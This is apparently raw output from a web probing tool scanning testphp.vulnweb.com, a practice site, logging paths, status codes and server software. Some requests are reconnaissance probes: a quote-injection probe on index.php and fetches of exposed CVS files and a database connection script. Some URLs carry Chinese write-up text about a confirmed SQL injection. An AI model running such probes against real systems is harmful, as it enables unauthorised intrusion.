Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/index.html\",\"time\":\"342.460884ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:16.113723024Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/index.php\",\"title\":\"ajax test\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/index.php\",\"time\":\"347.091758ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":258,\"lines\":156,\"status_code\":200,\"content_length\":4236,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:16.278427378Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/index.php\\u003cxml\\u003e\\u003cnode name=\\\"nodename1\\\"\\u003enodetext1\\u003c/node\\u003e\\u003cnode name=\\\"nodename2\\\"\\u003enodetext2\\u003c/node\\u003e\\u003c/xml\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/index.php%3Cxml%3E%3Cnode%20name=%22nodename1%22%3Enodetext1%3C/node%3E%3Cnode%20name=%22nodename2%22%3Enodetext2%3C/node%3E%3C/xml%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/index.php%3Cxml%3E%3Cnode%20name=%22nodename1%22%3Enodetext1%3C/node%3E%3Cnode%20name=%22nodename2%22%3Enodetext2%3C/node%3E%3C/xml%3E\",\"time\":\"346.381321ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:16.368666649Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/index.php'\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/index.php'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/index.php'\",\"time\":\"343.353341ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:16.413906738Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/index.php--user-data-dir\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/index.php--user-data-dir\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/index.php--user-data-dir\",\"time\":\"338.656433ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:16.537931079Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/infocateg.php\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/infocateg.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infocateg.php\",\"time\":\"345.398419ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":3,\"status_code\":200,\"content_length\":145,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:16.548994463Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/infoartist.php\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/infoartist.php?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php\",\"time\":\"353.160684ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:16.605988045Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/infocateg.php】并提交【id=1】,所以构建为\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/infocateg.php%E3%80%91%E5%B9%B6%E6%8F%90%E4%BA%A4%E3%80%90id=1%E3%80%91%EF%BC%8C%E6%89%80%E4%BB%A5%E6%9E%84%E5%BB%BA%E4%B8%BA\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infocateg.php%E3%80%91%E5%B9%B6%E6%8F%90%E4%BA%A4%E3%80%90id=1%E3%80%91%EF%BC%8C%E6%89%80%E4%BB%A5%E6%9E%84%E5%BB%BA%E4%B8%BA\",\"time\":\"348.282685ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:16.612962838Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/infocateg.php】存在sqlinject无误,进行相应的修复\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/infocateg.php%E3%80%91%E5%AD%98%E5%9C%A8sqlinject%E6%97%A0%E8%AF%AF%EF%BC%8C%E8%BF%9B%E8%A1%8C%E7%9B%B8%E5%BA%94%E7%9A%84%E4%BF%AE%E5%A4%8D\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infocateg.php%E3%80%91%E5%AD%98%E5%9C%A8sqlinject%E6%97%A0%E8%AF%AF%EF%BC%8C%E8%BF%9B%E8%A1%8C%E7%9B%B8%E5%BA%94%E7%9A%84%E4%BF%AE%E5%A4%8D\",\"time\":\"352.121243ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:16.627159758Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/infocateg.php?id=1\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/infocateg.php?id=1\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infocateg.php?id=1\",\"time\":\"348.410723ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":42,\"lines\":4,\"status_code\":200,\"content_length\":323,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:16.754611587Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/infotitle.php\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/infotitle.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infotitle.php\",\"time\":\"341.735023ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":3,\"status_code\":200,\"content_length\":145,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:16.97527626Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/showxml.php\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/showxml.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/showxml.php\",\"time\":\"343.482289ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":1,\"status_code\":200,\"content_length\":11,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:17.078674137Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/styles.css\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/styles.css\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/css\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/styles.css\",\"time\":\"342.586972ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":41,\"lines\":36,\"status_code\":200,\"content_length\":562,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:17.166625797Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/titles.php\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/titles.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/titles.php\",\"time\":\"354.451941ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":1,\"status_code\":200,\"content_length\":323,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:17.340814339Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/CVS\",\"input\":\"http://testphp.vulnweb.com:80/CVS\",\"location\":\"http://testphp.vulnweb.com/CVS/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS\",\"time\":\"354.398899ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:17.412698676Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/CVS/Entries\",\"input\":\"http://testphp.vulnweb.com:80/CVS/Entries\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/Entries\",\"time\":\"351.833105ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":1,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:17.444641608Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/CVS/Entries.Log\",\"input\":\"http://testphp.vulnweb.com:80/CVS/Entries.Log\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/Entries.Log\",\"time\":\"343.874951ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":1,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:17.588975145Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/CVS/Repository\",\"input\":\"http://testphp.vulnweb.com:80/CVS/Repository\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/Repository\",\"time\":\"352.323146ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":8,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:17.604537368Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/CVS/Root\",\"input\":\"http://testphp.vulnweb.com:80/CVS/Root\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/Root\",\"time\":\"351.756827ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":1,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:17.658177445Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Connections/DB_Connection.php\",\"input\":\"http://testphp.vulnweb.com:80/Connections/DB_Connection.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Connections/DB_Connection.php\",\"time\":\"349.273232ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":23,\"lines\":5,\"status_code\":200,\"content_length\":236,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:17.662594405Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Connections\",\"input\":\"http://testphp.vulnweb.com:80/Connections\",\"location\":\"http://testphp.vulnweb.com/Connections/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Connections\",\"time\":\"357.108517ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:17.673260232Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Flash\",\"input\":\"http://testphp.vulnweb.com:80/Flash\",\"location\":\"http://testphp.vulnweb.com/Flash/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Flash\",\"time\":\"356.422337ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:17.804308838Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/GET /comment.php\",\"input\":\"http://testphp.vulnweb.com:80/GET%20/comment.php?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/GET%20/comment.php\",\"time\":\"352.330575ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.024522824Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/GET /listproducts.php\",\"input\":\"http://testphp.vulnweb.com:80/GET%20/listproducts.php?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/GET%20/listproducts.php\",\"time\":\"356.122392ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.036241779Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/GET /showimage.php\",\"input\":\"http://testphp.vulnweb.com:80/GET%20/showimage.php?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/GET%20/showimage.php\",\"time\":\"352.853724ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.070773804Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop\",\"location\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop\",\"time\":\"347.427319ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.136900267Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/\",\"time\":\"345.986274ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":45,\"lines\":4,\"status_code\":200,\"content_length\":975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.209203835Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/BuyProduct-1/\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/BuyProduct-1/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/\",\"time\":\"347.460335ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":2,\"status_code\":200,\"content_length\":100,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.388235279Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/BuyProduct-2/\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/BuyProduct-2/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/\",\"time\":\"342.641996ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":8,\"lines\":2,\"status_code\":200,\"content_length\":76,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.412718313Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/BuyProduct-3\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/BuyProduct-3\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"time\":\"352.3097ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.454502246Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/BuyProduct-3/\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/BuyProduct-3/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/\",\"time\":\"344.18431ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":93,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.495494909Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/Details/color-printer/3/\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/Details/color-printer/3/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3/\",\"time\":\"348.610497ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":313,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.640985283Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/\",\"time\":\"353.084673ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.656317586Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/\",\"time\":\"358.096073ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":279,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.707709654Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/RateProduct-1.html\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/RateProduct-1.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/RateProduct-1.html\",\"time\":\"343.085327ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":2,\"status_code\":200,\"content_length\":100,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.708825522Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/RateProduct-2.html\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/RateProduct-2.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/RateProduct-2.html\",\"time\":\"347.018155ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":8,\"lines\":2,\"status_code\":200,\"content_length\":76,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.725800625Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/RateProduct-3.html\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/RateProduct-3.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/RateProduct-3.html\",\"time\":\"352.013103ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":93,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:18.851623317Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/details.php\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/details.php?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php\",\"time\":\"345.863222ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":2,\"status_code\":200,\"content_length\":47,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.070555648Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/images\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/images\",\"location\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/\",\"title\":\"301 Moved 